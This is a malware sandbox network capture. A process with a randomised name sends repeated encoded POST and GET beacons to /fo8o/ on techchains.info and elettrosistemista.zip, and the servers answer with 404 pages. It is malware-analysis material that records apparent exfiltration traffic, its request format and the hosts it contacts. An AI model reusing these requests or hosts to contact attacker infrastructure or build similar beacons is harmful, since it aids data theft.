                                                                                      Dec 6, 2024 17:45:51.066809893 CET1236INData Raw: 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f
                                                                                      Data Ascii: ink:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#0a48ff;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-b
                                                                                      Dec 6, 2024 17:45:51.066822052 CET1236INData Raw: 31 32 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 35 70 78 3b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 32 70 78 20 38 70 78 3b 63 6f 6c 6f 72 3a 23 36 33 38 32 39 36 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c
                                                                                      Data Ascii: 12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{display:inline-block}.container-disclaimer__content-text,.container-disclaimer a{font-size:10px}.container
                                                                                      Dec 6, 2024 17:45:51.066833973 CET1236INData Raw: 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 0d 0a 31 43
                                                                                      Data Ascii: tive-header,.container-cookie-message__content-interactive-text{color:#fff}.co1CFntainer-cookie-message__content-interactive-header{font-size:small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;margin
                                                                                      Dec 6, 2024 17:45:51.066951990 CET1236INData Raw: 3a 2e 33 73 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73
                                                                                      Data Ascii: :.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--success:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color
                                                                                      Dec 6, 2024 17:45:51.066994905 CET1236INData Raw: 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a
                                                                                      Data Ascii: re{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform
                                                                                      Dec 6, 2024 17:45:51.186558962 CET1236INData Raw: 6f 78 50 61 74 68 22 3a 22 2f 2f 77 77 77 2e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2e 70 68 70 22 2c 22 73 65 61 72 63 68 50 61 72 61 6d 73 22 3a 7b 22 73 65 73 22 3a 22 59 33 4a 6c 50 54 45 33 4d 7a 4d 31 4d 44 4d
                                                                                      Data Ascii: oxPath":"//www.rssnewscast.com/parking.php","searchParams":{"ses":"Y3JlPTE3MzM1MDM1NTAmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjc1MzJhM2VkMGExYjAuNjE5MjQ3OTcmdGFzaz1zZWFyY2gmZG9tYWluPXJzc25ld3NjYXN0LmNvbSZhX2lkPTEmc2Vzc2lvbj1RdDl1UU45U09BT2pNYkpuc29f


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.94998766.29.149.46804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:05.415682077 CET771OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.techchains.info
                                                                                      Origin: http://www.techchains.info
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.techchains.info/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 4a 73 72 71 61 53 64 72 63 68 63 50 52 57 46 59 34 57 4d 76 6b 43 39 6e 39 47 5a 2b
                                                                                      Data Ascii: LzY4r=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXJsrqaSdrchcPRWFY4WMvkC9n9GZ+
                                                                                      Dec 6, 2024 17:46:06.655134916 CET637INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:06 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.94998866.29.149.46804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:08.070110083 CET795OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.techchains.info
                                                                                      Origin: http://www.techchains.info
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.techchains.info/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 39 41 36 68 51 57 76 62 6a 41 46 57 58 33 2b 34 52 52 52 74 48 4a 58 4a 50 64 67 77 3d 3d
                                                                                      Data Ascii: LzY4r=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xV9A6hQWvbjAFWX3+4RRRtHJXJPdgw==
                                                                                      Dec 6, 2024 17:46:09.324565887 CET637INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:09 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.94998966.29.149.46804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:10.727907896 CET1808OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.techchains.info
                                                                                      Origin: http://www.techchains.info
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1230
                                                                                      Referer: http://www.techchains.info/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 33 68 31 79 6c 4d 79 39 68 4d 77 6e 74 50 62 42 6b 57 43 67 36 34 30 57 38 69 68 53 35 4c 52 2b 34 76 2f 70 31 59 78 43 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 33 4f 63 45 34 33 4a 56 57 37 4d 4e 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 [TRUNCATED]
                                                                                      Data Ascii: LzY4r=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNncWD2gFx3h1ylMy9hMwntPbBkWCg640W8ihS5LR+4v/p1YxCS0RRJqW2AzvpjGbI81Lp6Vkqb9Pz3pruauPRQmD4DIqh+ANga8k1X8kyPtMmgYp3OcE43JVW7MNLeIovAJRfcn/D+JcRQaBZrhksuDuZqlEsHJ/X78gWoLuPOUIMSi8BLb47JHp5nQZNcZXj6xRy4dk7daE4QycCvUUzUe6EDlGixQLo2JyxdCCjB99BrvphzvXwoYgEGGBegBYUvD1M4KwhiKDjBkp5+8SjFpcLjj3V7fQpSR0PSbup4sS5SNgcqy1OyNSNQdnD3Hhu1yTgz3358X5L3gwcN97/Tb8N80icRXci1wr2COz0bZo7UTHqzveHPd9mGha/5UkAaFDdAGV63Cf7j9sjapGbKqVEELpeL1i5bL26YgFxdJ5lNe+YT3YM9OlmqmD2UJvkBz+Bc7UEo30kuFMjx6+WkCWK2ptB2H5iPaOQmCiRUqguRsCCOR2XyV9r3bDe3Sr9DPwPncsYVk9OL/Bv2E6pDKZYkrTbNINFJsu3c9ylUJebX8j0GvZM58iiJRQth4q3gRhoqoWCVtpgo9JFAiREu3rTFL5UpGn8/ZdHL9W43MHFoRVYrBD8x6PTPO6hRpoJyuTrBbwNSv6d6/nvZWY5e07G5Z1M5OOaYc6G0R6X0aPT/iAJfN9F3ZSpq405nTPHH/dSOAdhN9HXvbWu4C99PUt6i5zjlVNQMHfw+F4e1tKVx6sazM4VNid74ESLno1paGPXJ4L2bMuXlKtbZXlBBCPQEWfVOAjAuvjpTESHd/c4P/tkXx1BG4JN14e4AV+TG3xTS [TRUNCATED]
                                                                                      Dec 6, 2024 17:46:11.955743074 CET637INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:11 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      16192.168.2.94999066.29.149.46804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:13.379751921 CET507OUTGET /fo8o/?LzY4r=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hLa4RxULGVWJLXVKOGZXf4u2rY2O36g==&F6=SVfTP6Q02ra8s0 HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.techchains.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 6, 2024 17:46:14.624983072 CET652INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:14 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 493
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      17192.168.2.949991195.110.124.133804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:20.746615887 CET789OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 194
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 4c 7a 59 34 72 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 6a 6a 30 4e 78 49 41 77 57 76 65 45 77 52 59 6f 58 4d 5a 68 46 6d 37 78 76 39 74 5a
                                                                                      Data Ascii: LzY4r=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCjj0NxIAwWveEwRYoXMZhFm7xv9tZ
                                                                                      Dec 6, 2024 17:46:22.053769112 CET367INHTTP/1.1 404 Not Found
                                                                                      Date: Fri, 06 Dec 2024 16:46:21 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 203
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.949992195.110.124.133804564C:\Program Files (x86)\ithlYRJJghGLFwrAGceeizHNjkhoAZopLLkBnGsGQrhpLEAmkOZFJvdobinYokmOlpcSZKdX\FBboLdkGSWBoDSVHPM.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 6, 2024 17:46:23.397727013 CET813OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.elettrosistemista.zip
                                                                                      Origin: http://www.elettrosistemista.zip
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 218
                                                                                      Referer: http://www.elettrosistemista.zip/fo8o/
